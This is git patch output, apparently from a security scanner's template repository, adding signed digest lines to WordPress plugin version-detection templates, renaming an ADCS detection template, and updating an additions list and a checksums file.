+46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100deb377984fd2b3ab9d27c28cb8a070d0ce275763fe901bb55b231a01fa3117c2022100a89391ba79403cb5d4083f2ef4d6618c038fdadedfdce568dc66f02b5ab77c41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..92442865d4 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f170af963b74277e46c3da5ba91fc83edcbf468c9498157c49e954f875662c720220618eab9f7680929c3b1ee51c1f8ad12517b64125c0436595dc728f34198c4f08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..a08b767629 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203934cca505b09c9bddbf78af4089aec5d025137a4d0d456eb7eb11563b12d257022100cd98223af3138e6b0a1bb9c8a4ca03dfd34c0863e1953f17bc63f855f1e5668a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..2f2812e964 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100815241f8421040a127bbdb3259fce90cfd87c46eec6bc4763f27a7d3d6aa713e022100ea786efd10cfeb0d9ec1b7cfdb78f494046b58bbd9442415627899e23a103442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..9120ceb7ec 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202ba536d064a4552f875d397b0708b9843805e7ef2daa313c6d835b05a69a747b0221008b01bd691c4f3d2e317c37e5c689814ca3b2f1868b75b1f3f28ef18378864bb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..be4ed15599 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c9cdd9a9270855ee166f1596b4b40f27800a6a9f4174216f83710fa4128e1bba022025c69b96e7007a78b3b6430d664ea921d55facc916f5e68a4ecd99c7fc966846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..841be88d9d 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d4ee1325ba19b866f722bc054eb6bfc7924d5fea84a3bcd2d1bdbbfdc561eff0220469c3933f131fdfcbe09378ebcaceea0e4601b4bc57c108098ca346e44b0470d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..f1d5acc0d9 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022039093043ab26441048b6b08994a650132e636b5a6a786c78fd796e631ae219a302210098cb0089292fdbdb87fbf3d01b73e194df76c4ffb98bdfe6a730437b6177caa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..5233960732 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220257fc3408cd037efa40f3965f70e07db7f4d2d80e7824a0905c6c69bc02f93a9022100813e17873e26f7b7100e2958036e149270d2722053cdcf229a8665522d91c35b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..820567bd84 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fdc176d18cfadc4ebdd03c96a2b2c896ba279b199c5fc5787ee65838289b5a8a02210081d9120859bb079fb9a5cde415bacf47eddc8a091b2a35efb5930726f2d29e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..6599e51b5b 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100887d497d3671535f30d43ff739fdd40c15acaedd878b27ee997bafee13c79811022100a3177032c93553fd1e11825ec7a9194e1610e9b51f0d2c1d2ac6d720a59f2c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..b0d3fd2d9a 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df72f793ea66e6994fa7b7c697bd5bde4b8d628eacb5e3a1f5490e418ce76bb30221008eeaf54a1ab709e9880f169789858d5cfb0133ba46fca489decc5b0b7aa3ddc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..db4ea9e87d 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203aa42be8215e7ba48b01d278798d1dda57df3238e6f3fafa54a4177dd5f06be2022039c61d93d8c9822f02d7a73fed1d57f3e8e0dd30ba57ab558bafcb4ca46a13a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6c3391d67a1122f5087677207d30bcc2a4f24305 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 11:34:35 +0530 Subject: [PATCH 1290/1841] minor-update --- .../exposures/files/{adcs-detect.yaml => adcs-certificate.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/exposures/files/{adcs-detect.yaml => adcs-certificate.yaml} (97%) diff --git a/http/exposures/files/adcs-detect.yaml b/http/exposures/files/adcs-certificate.yaml similarity index 97% rename from http/exposures/files/adcs-detect.yaml rename to http/exposures/files/adcs-certificate.yaml index 6bf0001b6c..b348b49268 100644 --- a/http/exposures/files/adcs-detect.yaml +++ b/http/exposures/files/adcs-certificate.yaml @@ -1,4 +1,4 @@ -id: adcs-detect +id: adcs-certificate info: name: Certification Authority Web Enrollment (ADCS) - Detection From 211cbab5bb4a93092995059d5ff424f3e066620c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 11:35:25 +0530 Subject: [PATCH 1291/1841] minor-update --- http/exposures/files/adcs-certificate.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/files/adcs-certificate.yaml b/http/exposures/files/adcs-certificate.yaml index b348b49268..537d3676f3 100644 --- a/http/exposures/files/adcs-certificate.yaml +++ b/http/exposures/files/adcs-certificate.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: html:"/certenroll" - tags: ad,adcs,exposure + tags: ad,adcs,exposure,files http: - method: GET From cc807e2209ff6af51b3f4d479fb22bcf397e06f5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:36:18 +0000 Subject: [PATCH 1292/1841] Auto Generated New Template Addition List [Tue Jul 16 08:36:18 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 804bb74809..3ac6711252 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/cves/2023/CVE-2023-48728.yaml http/cves/2024/CVE-2024-1512.yaml http/cves/2024/CVE-2024-2330.yaml http/cves/2024/CVE-2024-3742.yaml +http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml http/exposed-panels/falcosidekick-panel.yaml From 92c61a044a95ffbc563f301fbb22297e84841286 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 08:36:22 +0000 Subject: [PATCH 1293/1841] Auto Generated Templates Checksum [Tue Jul 16 08:36:22 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5d6543c990..7bf58fe294 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3478,7 +3478,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e -http/cves/2024/CVE-2024-36401.yaml:1092d9728d862b1d18a9ff74a145e414eb5e916e +http/cves/2024/CVE-2024-36401.yaml:ee5f88dccf1d4ffbb38cfea089a1a650527451ce http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 @@ -3491,6 +3491,7 @@ http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 +http/cves/2024/CVE-2024-4257.yaml:8876e33e746a9fd57af6a76fcac1c71ff3f00c4f http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a @@ -7290,229 +7291,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:78e473b2002903a0192fd998b91f26e855b03d5e +http/technologies/wordpress/plugins/add-to-any.yaml:9829716605e935b6985f72c38c410dded0e990bc +http/technologies/wordpress/plugins/admin-menu-editor.yaml:33096ed0f498d97bdcad8672086d15d1fdf5aeff http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:771b39420e143f066b590d47b05bdd6dcbe9c8a9 +http/technologies/wordpress/plugins/akismet.yaml:3134245df155fa9481f374871f595185bd758264 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0378656a08955e3633abb435d4e4f9cfc2237ae0 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:02be73602f59e4f4fa8dbed7bebbb05d32b0e094 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:458de0829203e3d0e9e4e39fbab567ae495937b2 +http/technologies/wordpress/plugins/amp.yaml:886625969dd2214d6e6a417c1f5e13a739140509 +http/technologies/wordpress/plugins/antispam-bee.yaml:e29d66f89996e3df7ffdf3d4811a7ea7dcd2aeb3 +http/technologies/wordpress/plugins/astra-sites.yaml:7a0612a7053fd0a6366d2c8159c76b9dc3530963 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:54e76f9353ed04e61edc88260c07d795799cb753 +http/technologies/wordpress/plugins/backwpup.yaml:0368fdc564f22bd200a1b3eaa429da460de885c3 +http/technologies/wordpress/plugins/better-search-replace.yaml:d4d8f3048d5dd89667e74b691025044ee1a92445 +http/technologies/wordpress/plugins/better-wp-security.yaml:e2359d1e8adca00efb5f7cec7030e3ef29f71939 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:a2ce81ec51c39edc8c6c4c98b36bed27cb660140 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:ee8c422d49eaba49cc3663b01112954828814582 +http/technologies/wordpress/plugins/breeze.yaml:d9df29e7c06d2f76fe4f3dadf2267d1dafe795cb +http/technologies/wordpress/plugins/broken-link-checker.yaml:fe20e82f147bef77dde5e0d9da362b22729c54c2 +http/technologies/wordpress/plugins/chaty.yaml:56e75be266a3df97a9bd96a1be5969ce6f1c601a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:eb93896a42336e406fdbc4c0c224ba2137a045fd +http/technologies/wordpress/plugins/classic-editor.yaml:7472544b59952d9e488b9479373f674dcd504698 +http/technologies/wordpress/plugins/classic-widgets.yaml:e09b4c360d3b798440e0705d9e44e87baae238dd +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:51350dbb567dd46b75e9a7a5b3168bcf99c079e0 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:760de8aae1d370996b6b7ab5f02961b673a8f4ba +http/technologies/wordpress/plugins/coblocks.yaml:09d89263f646e5e0b87f990ba38f043edc8ef1d4 +http/technologies/wordpress/plugins/code-snippets.yaml:4ec6bac5b93b6bc48ca4c658a4e44a48db45437f +http/technologies/wordpress/plugins/coming-soon.yaml:127d526f41beb277267848f9766495d93037bc8a +http/technologies/wordpress/plugins/complianz-gdpr.yaml:fe3df481e507e06ae7bd75e8274329ac122ebd4e +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:fc3284a54f46f1904d7e367f72a841f44a60184c +http/technologies/wordpress/plugins/contact-form-7.yaml:a7a98529a22cc2ffefc8f39e57704d4d7b24c743 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:787cdade7bfca275c8044c0d22f159c69d38cf94 +http/technologies/wordpress/plugins/cookie-law-info.yaml:3f3654b83db3e10f32e58186fc4706c92a61333b +http/technologies/wordpress/plugins/cookie-notice.yaml:282b48cf73ea493e94480cfe762001430e670dd8 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:739b0da6d12e7a54beae64fec15ba5489f92a76c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:024e57dc3d6252e31da74d796d4adb64e52f46b4 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:cb9cfb3a524411d3cf587af448d4d67524dc806b +http/technologies/wordpress/plugins/custom-css-js.yaml:2ea96134e7ecd686347fe547cc4e3ae9180f29f6 +http/technologies/wordpress/plugins/custom-fonts.yaml:b070221f62ce6b293246d67bda7a487c35cddd34 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:bcb9e6d2d00f130fdc992116d9eb74d63af01983 +http/technologies/wordpress/plugins/disable-comments.yaml:6b1efa4654dca1c4d3f7143e20d1af0f6338371e +http/technologies/wordpress/plugins/disable-gutenberg.yaml:00a576e9ee4fbfad19d9b6f76051b666285082b2 +http/technologies/wordpress/plugins/duplicate-page.yaml:ecc0a5b0227ca11ea92356eedfaaaeee9a8ccfdd +http/technologies/wordpress/plugins/duplicate-post.yaml:661a248fe506f8c5a90f516efddb472462aaa555 +http/technologies/wordpress/plugins/duplicator.yaml:1a51e74174628dc8fecefcc4a1357a22f31c864f +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:22a0ccc964f1077aabb44ed11e6c2216f5f18c23 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:b6c2eb154b5f9fd41712b3c5b459a0054840ceed +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7ddf504f55b31442ef2b56059cc5870e0e29391a +http/technologies/wordpress/plugins/elementor.yaml:e20569fbd5effbc6110c0afacc7b173467786a94 +http/technologies/wordpress/plugins/elementskit-lite.yaml:a3c3a9c532ca7e6a395ebbae65724e690e4ad560 +http/technologies/wordpress/plugins/enable-media-replace.yaml:96d6618f34adaa48aeb7addc9c28434d42465c09 +http/technologies/wordpress/plugins/envato-elements.yaml:aa52d86df76b910523d3b136c2cd7b509a1ac31d +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:95a1b73bc6ae282eb2bad75959a7fcc42078fce3 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:c76568be06469e9b389903c7f97666e80ac15a4a +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:b42e86c50387c938e1f531ffec3b4fffddfae403 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:1d7d8bbb4b4c1cf04af7d21fe5f0ad7ce4c40a9c +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:622e422741eb96285719822a3505550494b023b9 +http/technologies/wordpress/plugins/flamingo.yaml:71729d1a93512cb2654e4a8f0217dfc5f34ff1fd +http/technologies/wordpress/plugins/fluentform.yaml:ba86fa363674bea94f96ffc542311c10c668f380 +http/technologies/wordpress/plugins/font-awesome.yaml:70b67a78bb374be8c8c7e67dc6a7d86d7a6c264e +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:573c7bb9f9d9d8898b09752bcf6b3c4d567cedab +http/technologies/wordpress/plugins/formidable.yaml:c01de2367bc79d4a90850de4bbc47b95bfaa31b1 +http/technologies/wordpress/plugins/forminator.yaml:b467ff2ebb80f0ab600d043b2c16dddcd06ca78c +http/technologies/wordpress/plugins/ga-google-analytics.yaml:7d1d4e23e0e390a54f551b1f5f2cb346201a1287 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:e2e70790b5bf0c7eeecbf2177de6ea586ca6f2ae +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6be7bc00a40ebe98ae6d7f0cc7c8911bec424c85 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:41271f5fffb5cf6ea7800f0c568beb9f7b417d1f +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:7bcc4b36bc003928cd9c85831739b03d77e378d5 +http/technologies/wordpress/plugins/google-site-kit.yaml:e199dc9b16346d205343369c1cb037e1c0b81549 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:6cf01c208d481114e5b74d40fa76920f2ee340c9 +http/technologies/wordpress/plugins/gtranslate.yaml:e94fcb9e69e967674b12954f43d3f0b10653c7d2 +http/technologies/wordpress/plugins/gutenberg.yaml:f013246d544291befc978cc95d3d27d692c24434 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:c1cd2fbb1033d77055d742b747f69fe709f478bd 